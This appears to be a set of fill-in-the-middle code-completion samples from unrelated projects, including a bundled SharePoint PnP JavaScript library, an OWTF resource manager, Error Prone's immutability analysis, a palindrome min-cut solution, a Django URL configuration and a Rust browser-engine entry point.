* * @param profilePicSource Blob data representing the user's picture in BMP, JPEG, or PNG format of up to 4.76MB */ UserProfileQuery.prototype.setMyProfilePic = function (profilePicSource) { var _this = this; return new Promise(function (resolve, reject) { files_1.readBlobAsArrayBuffer(profilePicSource).then(function (buffer) { var request = new UserProfileQuery(_this, "setmyprofilepicture"); request.post({ body: String.fromCharCode.apply(null, new Uint16Array(buffer)), }).then(function (_) { return resolve(); }); }).catch(function (e) { return reject(e); }); }); }; /** * Provisions one or more users' personal sites. (My Site administrator on SharePoint Online only) * * @param emails The email addresses of the users to provision sites for */ UserProfileQuery.prototype.createPersonalSiteEnqueueBulk = function () { var emails = []; for (var _i = 0; _i < arguments.length; _i++) { emails[_i] = arguments[_i]; } return this.profileLoader.createPersonalSiteEnqueueBulk(emails); }; Object.defineProperty(UserProfileQuery.prototype, "ownerUserProfile", { /** * Gets the user profile of the site owner * */ get: function () { return this.profileLoader.ownerUserProfile; }, enumerable: true, configurable: true }); Object.defineProperty(UserProfileQuery.prototype, "userProfile", { /** * Gets the user profile for the current user */ get: function () { return this.profileLoader.userProfile; }, enumerable: true, configurable: true }); /** * Enqueues creating a personal site for this user, which can be used to share documents, web pages, and other files * * @param interactiveRequest true if interactively (web) initiated request, or false (default) if non-interactively (client) initiated request */ UserProfileQuery.prototype.createPersonalSite = function (interactiveRequest) { if (interactiveRequest === void 0) { interactiveRequest = false; } return this.profileLoader.createPersonalSite(interactiveRequest); }; /** * Sets the privacy settings for this profile * * @param share true to make all social data public; false to make all social data private */ UserProfileQuery.prototype.shareAllSocialData = function (share) { return this.profileLoader.shareAllSocialData(share); }; return UserProfileQuery; }(queryable_1.QueryableInstance)); exports.UserProfileQuery = UserProfileQuery; var ProfileLoader = (function (_super) { __extends(ProfileLoader, _super); /** * Creates a new instance of the ProfileLoader class * * @param baseUrl The url or Queryable which forms the parent of this profile loader */ function ProfileLoader(baseUrl, path) { if (path === void 0) { path = "_api/sp.userprofiles.profileloader.getprofileloader"; } return _super.call(this, baseUrl, path) || this; } /** * Provisions one or more users' personal sites. (My Site administrator on SharePoint Online only) * * @param emails The email addresses of the users to provision sites for */ ProfileLoader.prototype.createPersonalSiteEnqueueBulk = function (emails) { return this.clone(ProfileLoader, "createpersonalsiteenqueuebulk").post({ body: JSON.stringify({ "emailIDs": emails }), }); }; Object.defineProperty(ProfileLoader.prototype, "ownerUserProfile", { /** * Gets the user profile of the site owner. * */ get: function () { var q = this.getParent(ProfileLoader, this.parentUrl, "_api/sp.userprofiles.profileloader.getowneruserprofile"); if (this.hasBatch) { q = q.inBatch(this.batch); } return q.postAs(); }, enumerable: true, configurable: true }); Object.defineProperty(ProfileLoader.prototype, "userProfile", { /** * Gets the user profile of the current user. 
* */ get: function () { return this.clone(ProfileLoader, "getuserprofile", true).postAs(); }, enumerable: true, configurable: true }); /** * Enqueues creating a personal site for this user, which can be used to share documents, web pages, and other files. * * @param interactiveRequest true if interactively (web) initiated request, or false (default) if non-interactively (client) initiated request */ ProfileLoader.prototype.createPersonalSite = function (interactiveRequest) { if (interactiveRequest === void 0) { interactiveRequest = false; } return this.clone(ProfileLoader, "getuserprofile/createpersonalsiteenque(" + interactiveRequest + ")", true).post(); }; /** * Sets the privacy settings for this profile * * @param share true to make all social data public; false to make all social data private. */ ProfileLoader.prototype.shareAllSocialData = function (share) { return this.clone(ProfileLoader, "getuserprofile/shareallsocialdata(" + share + ")", true).post(); }; return ProfileLoader; }(queryable_1.Queryable)); /***/ }), /* 49 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var util_1 = __webpack_require__(0); /** * Describes the views available in the current context * */ var Views = (function (_super) { __extends(Views, _super); /** * Creates a new instance of the Views class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Views(baseUrl, path) { if (path === void 0) { path = "views"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a view by guid id * * @param id The GUID id of the view */ Views.prototype.getById = function (id) { var v = new View(this); v.concat("('" + id + "')"); return v; }; /** * Gets a view by title (case-sensitive) * * @param title The case-sensitive title of the view */ Views.prototype.getByTitle = function (title) { return new View(this, "getByTitle('" + title + "')"); }; /** * Adds a new view to the collection * * @param title The new views's title * @param personalView True if this is a personal view, otherwise false, default = false * @param additionalSettings Will be passed as part of the view creation body */ /*tslint:disable max-line-length */ Views.prototype.add = function (title, personalView, additionalSettings) { var _this = this; if (personalView === void 0) { personalView = false; } if (additionalSettings === void 0) { additionalSettings = {}; } var postBody = JSON.stringify(util_1.Util.extend({ "PersonalView": personalView, "Title": title, "__metadata": { "type": "SP.View" }, }, additionalSettings)); return this.clone(Views, null, true).postAs({ body: postBody }).then(function (data) { return { data: data, view: _this.getById(data.Id), }; }); }; return Views; }(queryable_1.QueryableCollection)); exports.Views = Views; /** * Describes a single View instance * */ var View = (function (_super) { __extends(View, _super); function View() { return _super !== null && _super.apply(this, arguments) || this; } 
Object.defineProperty(View.prototype, "fields", { get: function () { return new ViewFields(this); }, enumerable: true, configurable: true }); /** * Updates this view intance with the supplied properties * * @param properties A plain object hash of values to update for the view */ View.prototype.update = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.View" }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, view: _this, }; }); }; /** * Delete this view * */ View.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; /** * Returns the list view as HTML. * */ View.prototype.renderAsHtml = function () { return this.clone(queryable_1.Queryable, "renderashtml", true).get(); }; return View; }(queryable_1.QueryableInstance)); exports.View = View; var ViewFields = (function (_super) { __extends(ViewFields, _super); function ViewFields(baseUrl, path) { if (path === void 0) { path = "viewfields"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a value that specifies the XML schema that represents the collection. */ ViewFields.prototype.getSchemaXml = function () { return this.clone(queryable_1.Queryable, "schemaxml", true).get(); }; /** * Adds the field with the specified field internal name or display name to the collection. * * @param fieldTitleOrInternalName The case-sensitive internal name or display name of the field to add. */ ViewFields.prototype.add = function (fieldTitleOrInternalName) { return this.clone(ViewFields, "addviewfield('" + fieldTitleOrInternalName + "')", true).post(); }; /** * Moves the field with the specified field internal name to the specified position in the collection. * * @param fieldInternalName The case-sensitive internal name of the field to move. * @param index The zero-based index of the new position for the field. */ ViewFields.prototype.move = function (fieldInternalName, index) { return this.clone(ViewFields, "moveviewfieldto", true).post({ body: JSON.stringify({ "field": fieldInternalName, "index": index }), }); }; /** * Removes all the fields from the collection. */ ViewFields.prototype.removeAll = function () { return this.clone(ViewFields, "removeallviewfields", true).post(); }; /** * Removes the field with the specified field internal name from the collection. * * @param fieldInternalName The case-sensitive internal name of the field to remove from the view. */ ViewFields.prototype.remove = function (fieldInternalName) { return this.clone(ViewFields, "removeviewfield('" + fieldInternalName + "')", true).post(); }; return ViewFields; }(queryable_1.QueryableCollection)); exports.ViewFields = ViewFields; /***/ }), /* 50 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? 
Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var LimitedWebPartManager = (function (_super) { __extends(LimitedWebPartManager, _super); function LimitedWebPartManager() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(LimitedWebPartManager.prototype, "webparts", { /** * Gets the set of web part definitions contained by this web part manager * */ get: function () { return new WebPartDefinitions(this, "webparts"); }, enumerable: true, configurable: true }); /** * Exports a webpart definition * * @param id the GUID id of the definition to export */ LimitedWebPartManager.prototype.export = function (id) { return this.clone(LimitedWebPartManager, "ExportWebPart", true).post({ body: JSON.stringify({ webPartId: id }), }); }; /** * Imports a webpart * * @param xml webpart definition which must be valid XML in the .dwp or .webpart format */ LimitedWebPartManager.prototype.import = function (xml) { return this.clone(LimitedWebPartManager, "ImportWebPart", true).post({ body: JSON.stringify({ webPartXml: xml }), }); }; return LimitedWebPartManager; }(queryable_1.Queryable)); exports.LimitedWebPartManager = LimitedWebPartManager; var WebPartDefinitions = (function (_super) { __extends(WebPartDefinitions, _super); function WebPartDefinitions() { return _super !== null && _super.apply(this, arguments) || this; } /** * Gets a web part definition from the collection by id * * @param id GUID id of the web part definition to get */ WebPartDefinitions.prototype.getById = function (id) { return new WebPartDefinition(this, "getbyid('" + id + "')"); }; return WebPartDefinitions; }(queryable_1.QueryableCollection)); exports.WebPartDefinitions = WebPartDefinitions; var WebPartDefinition = (function (_super) { __extends(WebPartDefinition, _super); function WebPartDefinition() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(WebPartDefinition.prototype, "webpart", { /** * Gets the webpart information associated with this definition */ get: function () { return new WebPart(this); }, enumerable: true, configurable: true }); /** * Removes a webpart from a page, all settings will be lost */ WebPartDefinition.prototype.delete = function () { return this.clone(WebPartDefinition, "DeleteWebPart", true).post(); }; return WebPartDefinition; }(queryable_1.QueryableInstance)); exports.WebPartDefinition = WebPartDefinition; var WebPart = (function (_super) { __extends(WebPart, _super); /** * Creates a new instance of the WebPart class * * @param baseUrl The url or Queryable which forms the parent of this fields collection * @param path Optional, if supplied will be appended to the supplied baseUrl */ function WebPart(baseUrl, path) { if (path === void 0) { path = "webpart"; } return _super.call(this, baseUrl, path) || this; } return WebPart; }(queryable_1.QueryableInstance)); exports.WebPart = WebPart; /***/ }), /* 51 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var logging_1 = __webpack_require__(5); function deprecated(message) { return function (target, propertyKey, descriptor) { var method = descriptor.value; descriptor.value = function () { var args = []; for (var _i = 0; _i < arguments.length; _i++) { args[_i] = arguments[_i]; } logging_1.Logger.log({ data: { descriptor: descriptor, propertyKey: propertyKey, target: target, 
}, level: logging_1.LogLevel.Warning, message: message, }); return method.apply(this, args); }; }; } exports.deprecated = deprecated; /***/ }), /* 52 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); /** * Reads a blob as text * * @param blob The data to read */ function readBlobAsText(blob) { return readBlobAs(blob, "string"); } exports.readBlobAsText = readBlobAsText; /** * Reads a blob into an array buffer * * @param blob The data to read */ function readBlobAsArrayBuffer(blob) { return readBlobAs(blob, "buffer"); } exports.readBlobAsArrayBuffer = readBlobAsArrayBuffer; /** * Generic method to read blob's content * * @param blob The data to read * @param mode The read mode */ function readBlobAs(blob, mode) { return new Promise(function (resolve, reject) { try { var reader = new FileReader(); reader.onload = function (e) { resolve(e.target.result); }; switch (mode) { case "string": reader.readAsText(blob); break; case "buffer": reader.readAsArrayBuffer(blob); break; } } catch (e) { reject(e); } }); } /***/ }) /******/ ]); }); //# sourceMappingURL=pnp.js.map<|fim▁end|>
/**
 * Removes the cross-site group with the specified name from the collection
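Each row in this dump follows the same fill-in-the-middle layout: a file-name header, a code prefix, a hole marker, a code suffix, and finally the completion that belongs in the hole (the JSDoc fragment just above is one such completion). A minimal Python sketch of how a row reassembles into the original file — the marker names come from the rows themselves; everything else here is invented, and each marker is assumed to occur exactly once per row:

# Minimal sketch: splice a completion back into the hole of one row above.
# The marker strings are built by concatenation only so this note does not
# itself contain literal row delimiters.
BEGIN = "<|" + "fim▁begin" + "|>"
HOLE = "<|" + "fim▁hole" + "|>"
END = "<|" + "fim▁end" + "|>"

def reassemble(prompt, completion):
    """Return the original file text, assuming each marker occurs once."""
    body = prompt.split(BEGIN, 1)[1]      # drop the file-name header
    prefix, rest = body.split(HOLE, 1)
    suffix = rest.rsplit(END, 1)[0]
    return prefix + completion + suffix

# Tiny self-contained check:
demo_prompt = BEGIN + "a = 1\n" + HOLE + "c = 3\n" + END
assert reassemble(demo_prompt, "b = 2\n") == "a = 1\nb = 2\nc = 3\n"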
<|file_name|>resource_manager.py<|end_file_name|><|fim▁begin|>from framework.db import models
from framework.config import config
from framework.dependency_management.dependency_resolver import BaseComponent
from framework.dependency_management.interfaces import ResourceInterface
from framework.lib.general import cprint
import os
import logging
from framework.utils import FileOperations


class ResourceDB(BaseComponent, ResourceInterface):

    COMPONENT_NAME = "resource"

    def __init__(self):
        self.register_in_service_locator()
        self.config = self.get_component("config")
        self.db_config = self.get_component("db_config")
        self.target = self.get_component("target")
        self.db = self.get_component("db")
        self.LoadResourceDBFromFile(self.config.get_profile_path("RESOURCES_PROFILE"))

    def LoadResourceDBFromFile(self, file_path):
        # This needs to be a list instead of a dictionary to preserve order in python < 2.7
<|fim▁hole|>
        # because we may have updated the resource
        self.db.session.query(models.Resource).filter_by(dirty=False).delete()
        # resources = [(Type, Name, Resource), (Type, Name, Resource),]
        for Type, Name, Resource in resources:
            self.db.session.add(models.Resource(resource_type=Type, resource_name=Name, resource=Resource))
        self.db.session.commit()

    def GetResourcesFromFile(self, resource_file):
        resources = set()
        ConfigFile = FileOperations.open(resource_file, 'r').read().splitlines()  # To remove stupid '\n' at the end
        for line in ConfigFile:
            if '#' == line[0]:
                continue  # Skip comment lines
            try:
                Type, Name, Resource = line.split('_____')
                # Resource = Resource.strip()
                resources.add((Type, Name, Resource))
            except ValueError:
                cprint("ERROR: The delimiter is incorrect in this line at Resource File: " + str(line.split('_____')))
        return resources

    def GetReplacementDict(self):
        configuration = self.db_config.GetReplacementDict()
        configuration.update(self.target.GetTargetConfig())
        configuration.update(self.config.GetReplacementDict())
        return configuration

    def GetRawResources(self, ResourceType):
        filter_query = self.db.session.query(models.Resource.resource_name, models.Resource.resource).filter_by(resource_type = ResourceType)
        # Sorting is necessary for working of ExtractURLs, since it must run after main command, so order is imp
        sort_query = filter_query.order_by(models.Resource.id)
        raw_resources = sort_query.all()
        return raw_resources

    def GetResources(self, ResourceType):
        replacement_dict = self.GetReplacementDict()
        raw_resources = self.GetRawResources(ResourceType)
        resources = []
        for name, resource in raw_resources:
            resources.append([name, self.config.MultipleReplace(resource, replacement_dict)])
        return resources

    def GetRawResourceList(self, ResourceList):
        raw_resources = self.db.session.query(models.Resource.resource_name, models.Resource.resource).filter(models.Resource.resource_type.in_(ResourceList)).all()
        return raw_resources

    def GetResourceList(self, ResourceTypeList):
        replacement_dict = self.GetReplacementDict()
        raw_resources = self.GetRawResourceList(ResourceTypeList)
        resources = []
        for name, resource in raw_resources:
            resources.append([name, self.config.MultipleReplace(resource, replacement_dict)])
        return resources<|fim▁end|>
logging.info("Loading Resources from: " + file_path + " ..") resources = self.GetResourcesFromFile(file_path) # Delete all old resources which are not edited by user
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|><|fim▁hole|>
__version__ = '1.1.0'

default_app_config = 'ipware.apps.AppConfig'<|fim▁end|>
# -*- coding: utf-8 -*-
<|file_name|>ImmutableAnalysis.java<|end_file_name|><|fim▁begin|>/*
 * Copyright 2016 The Error Prone Authors.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package com.google.errorprone.bugpatterns.threadsafety;

import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableSet;
import com.google.errorprone.VisitorState;
import com.google.errorprone.annotations.CheckReturnValue;
import com.google.errorprone.annotations.Immutable;
import com.google.errorprone.annotations.ImmutableTypeParameter;
import com.google.errorprone.annotations.concurrent.LazyInit;
import com.google.errorprone.bugpatterns.BugChecker;
import com.google.errorprone.bugpatterns.threadsafety.ThreadSafety.Purpose;
import com.google.errorprone.bugpatterns.threadsafety.ThreadSafety.Violation;
import com.google.errorprone.fixes.SuggestedFix;
import com.google.errorprone.fixes.SuggestedFixes;
import com.google.errorprone.matchers.Description;
import com.google.errorprone.util.ASTHelpers;
import com.sun.source.tree.ClassTree;
import com.sun.source.tree.Tree;
import com.sun.tools.javac.code.Symbol;
import com.sun.tools.javac.code.Symbol.ClassSymbol;
import com.sun.tools.javac.code.Symbol.TypeVariableSymbol;
import com.sun.tools.javac.code.Symbol.VarSymbol;
import com.sun.tools.javac.code.Type;
import com.sun.tools.javac.code.Type.ClassType;
import java.util.Collection;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.Set;
import java.util.function.Predicate;
import javax.lang.model.element.ElementKind;
import javax.lang.model.element.Modifier;
import javax.lang.model.type.TypeKind;

/** Analyzes types for deep immutability. */
public class ImmutableAnalysis {

  private final BugChecker bugChecker;
  private final VisitorState state;
  private final WellKnownMutability wellKnownMutability;
  private final ThreadSafety threadSafety;

  ImmutableAnalysis(
      BugChecker bugChecker,
      VisitorState state,
      WellKnownMutability wellKnownMutability,
      ImmutableSet<String> immutableAnnotations) {
    this.bugChecker = bugChecker;
    this.state = state;
    this.wellKnownMutability = wellKnownMutability;
    this.threadSafety =
        ThreadSafety.builder()
            .setPurpose(Purpose.FOR_IMMUTABLE_CHECKER)
            .knownTypes(wellKnownMutability)
            .markerAnnotations(immutableAnnotations)
            .typeParameterAnnotation(ImmutableTypeParameter.class)
            .build(state);
  }

  public ImmutableAnalysis(
      BugChecker bugChecker, VisitorState state, WellKnownMutability wellKnownMutability) {
    this(bugChecker, state, wellKnownMutability, ImmutableSet.of(Immutable.class.getName()));
  }

  Violation isThreadSafeType(
      boolean allowContainerTypeParameters, Set<String> containerTypeParameters, Type type) {
    return threadSafety.isThreadSafeType(
        allowContainerTypeParameters, containerTypeParameters, type);
  }

  boolean hasThreadSafeTypeParameterAnnotation(TypeVariableSymbol sym) {
    return threadSafety.hasThreadSafeTypeParameterAnnotation(sym);
  }

  Violation checkInstantiation(
      Collection<TypeVariableSymbol> classTypeParameters, Collection<Type> typeArguments) {
    return threadSafety.checkInstantiation(classTypeParameters, typeArguments);
  }

  public Violation checkInvocation(Type methodType, Symbol symbol) {
    return threadSafety.checkInvocation(methodType, symbol);
  }

  /** Accepts {@link Violation violations} that are found during the analysis. */
  @FunctionalInterface
  public interface ViolationReporter {
    Description.Builder describe(Tree tree, Violation info);

    @CheckReturnValue
    default Description report(Tree tree, Violation info, Optional<SuggestedFix> suggestedFix) {
      Description.Builder description = describe(tree, info);
      suggestedFix.ifPresent(description::addFix);
      return description.build();
    }
  }

  /**
   * Check that an {@code @Immutable}-annotated class:
   *
   * <ul>
   *   <li>does not declare or inherit any mutable fields,
   *   <li>any immutable supertypes are instantiated with immutable type arguments as required by
   *       their containerOf spec, and
   *   <li>any enclosing instances are immutable.
   * </ul>
   *
   * requiring supertypes to be annotated immutable would be too restrictive.
   */
  public Violation checkForImmutability(
      Optional<ClassTree> tree,
      ImmutableSet<String> immutableTyParams,
      ClassType type,
      ViolationReporter reporter) {
    Violation info = areFieldsImmutable(tree, immutableTyParams, type, reporter);
    if (info.isPresent()) {
      return info;
    }

    for (Type interfaceType : state.getTypes().interfaces(type)) {
      AnnotationInfo interfaceAnnotation = getImmutableAnnotation(interfaceType.tsym, state);
      if (interfaceAnnotation == null) {
        continue;
      }
      info =
          threadSafety.checkSuperInstantiation(
              immutableTyParams, interfaceAnnotation, interfaceType);
      if (info.isPresent()) {
        return info.plus(
            String.format(
                "'%s' extends '%s'",
                threadSafety.getPrettyName(type.tsym),
                threadSafety.getPrettyName(interfaceType.tsym)));
      }
    }

    if (!type.asElement().isEnum()) {
      // don't check enum super types here to avoid double-reporting errors
<|fim▁hole|>
      if (info.isPresent()) {
        return info;
      }
    }

    Type mutableEnclosing = threadSafety.mutableEnclosingInstance(tree, type);
    if (mutableEnclosing != null) {
      return info.plus(
          String.format(
              "'%s' has mutable enclosing instance '%s'",
              threadSafety.getPrettyName(type.tsym), mutableEnclosing));
    }

    return Violation.absent();
  }

  private Violation checkSuper(ImmutableSet<String> immutableTyParams, ClassType type) {
    ClassType superType = (ClassType) state.getTypes().supertype(type);
    if (superType.getKind() == TypeKind.NONE
        || state.getTypes().isSameType(state.getSymtab().objectType, superType)) {
      return Violation.absent();
    }
    if (WellKnownMutability.isAnnotation(state, type)) {
      // TODO(b/25630189): add enforcement
      return Violation.absent();
    }

    AnnotationInfo superannotation = getImmutableAnnotation(superType.tsym, state);
    String message =
        String.format(
            "'%s' extends '%s'",
            threadSafety.getPrettyName(type.tsym), threadSafety.getPrettyName(superType.tsym));
    if (superannotation != null) {
      // If the superclass does happen to be immutable, we don't need to recursively
      // inspect it. We just have to check that it's instantiated correctly:
      Violation info =
          threadSafety.checkSuperInstantiation(immutableTyParams, superannotation, superType);
      if (!info.isPresent()) {
        return Violation.absent();
      }
      return info.plus(message);
    }

    // Recursive case: check if the supertype is 'effectively' immutable.
    Violation info =
        checkForImmutability(
            Optional.<ClassTree>empty(),
            immutableTyParams,
            superType,
            new ViolationReporter() {
              @Override
              public Description.Builder describe(Tree tree, Violation info) {
                return bugChecker
                    .buildDescription(tree)
                    .setMessage(info.plus(info.message()).message());
              }
            });
    if (!info.isPresent()) {
      return Violation.absent();
    }
    return info.plus(message);
  }

  /**
   * Check a single class' fields for immutability.
   *
   * @param immutableTyParams the in-scope immutable type parameters
   * @param classType the type to check the fields of
   */
  Violation areFieldsImmutable(
      Optional<ClassTree> tree,
      ImmutableSet<String> immutableTyParams,
      ClassType classType,
      ViolationReporter reporter) {
    ClassSymbol classSym = (ClassSymbol) classType.tsym;
    if (classSym.members() == null) {
      return Violation.absent();
    }
    Predicate<Symbol> instanceFieldFilter =
        symbol -> symbol.getKind() == ElementKind.FIELD && !symbol.isStatic();
    Map<Symbol, Tree> declarations = new HashMap<>();
    if (tree.isPresent()) {
      for (Tree member : tree.get().getMembers()) {
        Symbol sym = ASTHelpers.getSymbol(member);
        if (sym != null) {
          declarations.put(sym, member);
        }
      }
    }
    // javac gives us members in reverse declaration order
    // handling them in declaration order leads to marginally better diagnostics
    List<Symbol> members =
        ImmutableList.copyOf(ASTHelpers.scope(classSym.members()).getSymbols(instanceFieldFilter))
            .reverse();
    for (Symbol member : members) {
      Optional<Tree> memberTree = Optional.ofNullable(declarations.get(member));
      Violation info =
          isFieldImmutable(
              memberTree, immutableTyParams, classSym, classType, (VarSymbol) member, reporter);
      if (info.isPresent()) {
        return info;
      }
    }
    return Violation.absent();
  }

  /** Check a single field for immutability. */
  private Violation isFieldImmutable(
      Optional<Tree> tree,
      ImmutableSet<String> immutableTyParams,
      ClassSymbol classSym,
      ClassType classType,
      VarSymbol var,
      ViolationReporter reporter) {
    if (bugChecker.isSuppressed(var)) {
      return Violation.absent();
    }
    if (!var.getModifiers().contains(Modifier.FINAL)
        && !ASTHelpers.hasAnnotation(var, LazyInit.class, state)) {
      Violation info =
          Violation.of(
              String.format(
                  "'%s' has non-final field '%s'",
                  threadSafety.getPrettyName(classSym), var.getSimpleName()));
      if (tree.isPresent()) {
        // If we have a tree to attach diagnostics to, report the error immediately instead of
        // accumulating the path to the error from the top-level class being checked
        state.reportMatch(
            reporter.report(
                tree.get(), info, SuggestedFixes.addModifiers(tree.get(), state, Modifier.FINAL)));
        return Violation.absent();
      }
      return info;
    }
    Type varType = state.getTypes().memberType(classType, var);
    Violation info =
        threadSafety.isThreadSafeType(
            /* allowContainerTypeParameters= */ true, immutableTyParams, varType);
    if (info.isPresent()) {
      info =
          info.plus(
              String.format(
                  "'%s' has field '%s' of type '%s'",
                  threadSafety.getPrettyName(classSym), var.getSimpleName(), varType));
      if (tree.isPresent()) {
        // If we have a tree to attach diagnostics to, report the error immediately instead of
        // accumulating the path to the error from the top-level class being checked
        state.reportMatch(reporter.report(tree.get(), info, Optional.empty()));
        return Violation.absent();
      }
      return info;
    }
    return Violation.absent();
  }

  /**
   * Gets the {@link Symbol}'s {@code @Immutable} annotation info, either from an annotation on the
   * symbol or from the list of well-known immutable types.
   */
  AnnotationInfo getImmutableAnnotation(Symbol sym, VisitorState state) {
    String nameStr = sym.flatName().toString();
    AnnotationInfo known = wellKnownMutability.getKnownImmutableClasses().get(nameStr);
    if (known != null) {
      return known;
    }
    return threadSafety.getInheritedAnnotation(sym, state);
  }

  /**
   * Gets the {@link Tree}'s {@code @Immutable} annotation info, either from an annotation on the
   * symbol or from the list of well-known immutable types.
   */
  AnnotationInfo getImmutableAnnotation(Tree tree, VisitorState state) {
    Symbol sym = ASTHelpers.getSymbol(tree);
    return sym == null ? null : threadSafety.getMarkerOrAcceptedAnnotation(sym, state);
  }
}<|fim▁end|>
info = checkSuper(immutableTyParams, type);
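The completion above slots the recursive supertype check into checkForImmutability, which otherwise walks interfaces and fields; a type passes only if every reachable field is final and itself immutable. A toy Python sketch of that shape of analysis — the type records and names below are invented, and only the recursion mirrors the checker:

# Toy model of a deep-immutability walk: a type is immutable only if every
# field is final and its own type is (recursively) immutable.
TYPES = {
    "String": {"fields": {}, "immutable": True},
    "int":    {"fields": {}, "immutable": True},
    "Point":  {"fields": {"x": ("int", True), "y": ("int", True)}, "immutable": None},
    "Box":    {"fields": {"label": ("String", True), "point": ("Point", False)}, "immutable": None},
}

def is_deeply_immutable(name, seen=None):
    seen = seen or set()
    if name in seen:                 # break cycles
        return True
    seen.add(name)
    info = TYPES[name]
    if info["immutable"] is not None:
        return info["immutable"]     # well-known verdict, like WellKnownMutability
    for field, (ftype, is_final) in info["fields"].items():
        if not is_final or not is_deeply_immutable(ftype, seen):
            return False             # a violation; the real checker also records why
    return True

print(is_deeply_immutable("Point"))  # True: both fields final and immutable
print(is_deeply_immutable("Box"))    # False: 'point' is not final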
<|file_name|>main1.cpp<|end_file_name|><|fim▁begin|>class Solution {
public:
    int minCut(string s) {
        if (s.size() < 2) {
            return 0;
        }
        int len = s.size();
        vector<int> cut(len + 1, 0); // cut[i] : s[0..i-1] min cut
        for (int i = 0; i <= len; i++) {
            cut[i] = i - 1;
        }
        for (int i = 0; i < len; i++) {
            // odd len
            for (int l = 0; i - l >= 0 && i + l < len && s[i - l] == s[i + l]; l++) {
                cut[i + l + 1] = min(cut[i + l + 1], cut[i - l - 1 + 1] + 1);
            }
            // even
            // i,i+1
            for (int l = 0; i - l >= 0 && i + 1 + l < len && s[i - l] == s[i + 1 + l]; l++) {
                cut[i + 1 + l + 1] = min(cut[i + 1 + l + 1], cut[i - l - 1 + 1] + 1);
            }
        }

<|fim▁hole|><|fim▁end|>
        return cut[len];
    }
};
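The completion above returns cut[len], the answer of the expand-around-center DP in which cut[i] is the minimum number of cuts for the prefix s[0..i-1] and cut[0] = -1 acts as a sentinel so a palindromic prefix costs zero cuts. The same DP re-stated in Python as a hedged cross-check of the indices:

# Same expand-around-center palindrome-partitioning DP as the C++ above.
def min_cut(s):
    n = len(s)
    if n < 2:
        return 0
    cut = [i - 1 for i in range(n + 1)]          # cut[0] = -1 sentinel
    for i in range(n):
        l = 0                                     # odd-length palindromes centered at i
        while i - l >= 0 and i + l < n and s[i - l] == s[i + l]:
            cut[i + l + 1] = min(cut[i + l + 1], cut[i - l] + 1)
            l += 1
        l = 0                                     # even-length, centered between i and i+1
        while i - l >= 0 and i + 1 + l < n and s[i - l] == s[i + 1 + l]:
            cut[i + 2 + l] = min(cut[i + 2 + l], cut[i - l] + 1)
            l += 1
    return cut[n]

assert min_cut("aab") == 1    # "aa" | "b"
assert min_cut("abba") == 0   # whole string is a palindrome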
<|file_name|>urls.py<|end_file_name|><|fim▁begin|>from django.conf.urls import url, patterns

from data import views

<|fim▁hole|>urlpatterns = patterns("data.views",
    url(r"^$", views.IndexView.as_view()),
    url(r"^a/(?P<application_external_id>[^/]{,255})\.json$", views.ApplicationInstanceListView.as_view()),
    url(r"^(?P<model_external_id>[^/]{,255})\.json$", views.InstanceListView.as_view()),
    url(r"^(?P<model_external_id>[^/]{,255})/(?P<instance_external_id>[^/]{,255})\.json", views.InstanceDetailView.as_view()),
)<|fim▁end|>
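The url() patterns above rely on named regex groups, which Django hands to the view as keyword arguments. A small standalone sketch of that mechanic using only the standard re module (the sample path is invented):

import re

# Same named-group pattern shape as the urlconf above.
pattern = re.compile(r"^(?P<model_external_id>[^/]{,255})\.json$")
match = pattern.match("books.json")
print(match.groupdict())   # {'model_external_id': 'books'} -> becomes view kwargs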
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>extern crate getopts;
extern crate image;

use getopts::{optopt,getopts};
use std::default::Default;
use std::io::fs::File;
use std::os::args;

mod css;
mod dom;
mod html;
mod layout;
mod style;
mod painting;

#[allow(unstable)]
fn main() {
    // Parse command-line options:
    let opts = [
        optopt("h", "html", "HTML document", "FILENAME"),
        optopt("c", "css", "CSS stylesheet", "FILENAME"),
        optopt("o", "output", "Output file", "FILENAME"),
    ];
    let matches = match getopts(args().tail(), &opts) {
        Ok(m) => m,
        Err(f) => panic!(f.to_string())
    };

    // Read input files:
    let read_source = |&: arg_filename: Option<String>, default_filename: &str| {
        let path = match arg_filename {
            Some(ref filename) => &**filename,
            None => default_filename,
        };
        File::open(&Path::new(path)).read_to_string().unwrap()
    };
